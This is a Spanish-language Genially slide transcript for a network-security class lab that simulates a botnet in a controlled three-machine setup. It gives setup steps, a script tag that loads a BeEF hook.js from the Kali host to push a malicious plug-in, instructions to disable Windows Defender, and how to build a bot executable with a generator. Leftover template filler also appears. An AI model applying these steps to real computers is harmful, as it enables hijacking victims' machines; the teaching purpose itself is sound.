Want to create interactive content? It’s easy in Genially!

Get started free

Mi Ordenador es un Zombie

Adolfo Morena Anguita

Created on February 5, 2026

Start designing with a free template

Discover more than 1500 professional designs like these:

Terrazzo Presentation

Visual Presentation

Relaxing Presentation

Modern Presentation

Colorful Presentation

Modular Structure Presentation

Chromatic Presentation

Transcript

Mi Ordenador es un Zombie

Seguridad en RedesAdolfo Morena Anguita

Objetivo

El objetivo de esta práctica es simular, en un entorno controlado de clase, la infección de varios equipos para que puedan ser controlados desde un único equipo atacante mediante un servidor de bots. Una vez comprometido el equipo víctima, se comprueba el control remoto verificando que aparece el plug-in malicioso y que el atacante es capaz de capturar la pantalla del equipo infectado.

Entorno de la práctica

La práctica se realiza en un entorno controlado con tres máquinas en la misma red.

  • La máquina atacante (Windows 7) aloja el servidor web, el servidor de bots y la base de datos de los equipos infectados.
  • La máquina propagadora (Kali Linux) se utiliza para mostrar a la víctima un plug-in malicioso mediante la herramienta BeEF.
  • La máquina víctima (Windows 7 INCIBE), ejecutada en una máquina virtual, accede a la página web desde el navegador Firefox y recibe la infección sin afectar al equipo real.

Primer paso: instalación y configuración de WAMP

En la máquina atacante se instala WAMP, que actúa como servidor web local.Tras la instalación, debemos modificar el archivo de configuración de Apache (httpd.conf) para permitir el acceso desde otros equipos de la red, cambiando la directiva de acceso local por acceso general, buscamos “onlineoffline” y justo debajo cambiamos “Require local” por “Require all granted”. A continuación, se copian los ficheros necesarios de la práctica (todo el contenido de las carpetas "www" y "Servidor web") al directorio público del servidor (C:\wamp\www) y se reinician los servicios de Apache y MySQL para aplicar los cambios.

Por último debemos importar la base de datos "localhost.sql" en phpMyAdmindel Wamp.

  • Comprobamos que el servidor de Wamp esté activado.
  • En Wamp entramos en phpMyAdmin o escribimos "http://localhost/phpmyadmin/" en nuestro buscador.
  • Pulsamos en "Importar" y "Seleccionar archivo" y buscamos el archivo de la base de datos.

Modificación de "pagina.php"

Abrimos el archivo con un editor de texto y cambiamos en esta línea la IP por la IP de la máquina propagadora, en este caso Kali.'<script src="http://192.168.1.105:3000/hook.js" type="text/javascript"><\/script>' Así cuando la víctima tenga nuestra página cargada su navegador solicita el script alojado en Kali, lo que provoca la aparición de un mensaje para instalar un plug-in.

Generación del virus

Antes de generar el ejecutable debemos desactivar la configuración del antivirus ya que Windows Defender puede eliminar los ficheros necesarios durante el proceso.Nos descargamos la carpeta "Ejecutables compilados", copiamos el ejecutable "flu-nucleo.exe" (asegurandonos de que su tamaño sea de 30 KB) en la carpeta "c:/wamp/www". Posteriormente ejecuntamos "generadorBots" que está en la misma carpeta. En la primera caja de texto ponemos la Ip de la máquina atacante, pulsamos en "Crear" y guardamos "flu.exe" en la carpeta "c:/wamp/www"

Escribe un título aquí

Disciplinas como el Visual Thinking facilitan la toma de notas visualmente ricas gracias al uso de imágenes, gráficas, infografías y dibujos sencillos. ¡Dale caña!

El contenido visual es un lenguaje transversal, universal, como la música. Somos capaces de entender imágenes de hace millones de años, incluso de otras culturas.

¿Sabías que Genially te permite compartir tu creación directamente, sin necesidad de descargas? Listo para que tu público pueda visualizarlo en cualquier dispositivo y difundir en cualquier lugar.

Utiliza este espacio para poner una frase genial

02:30

Seguridad en Redes

¡Muchas gracias!

Adolfo Morena Anguita adomorang@gmail.com

Archivo de configuración

Ficheros necesarios

IP Máquina atacante

IP Máquina propagadora

IP Máquina víctima

Archivo de configuración

Ficheros necesarios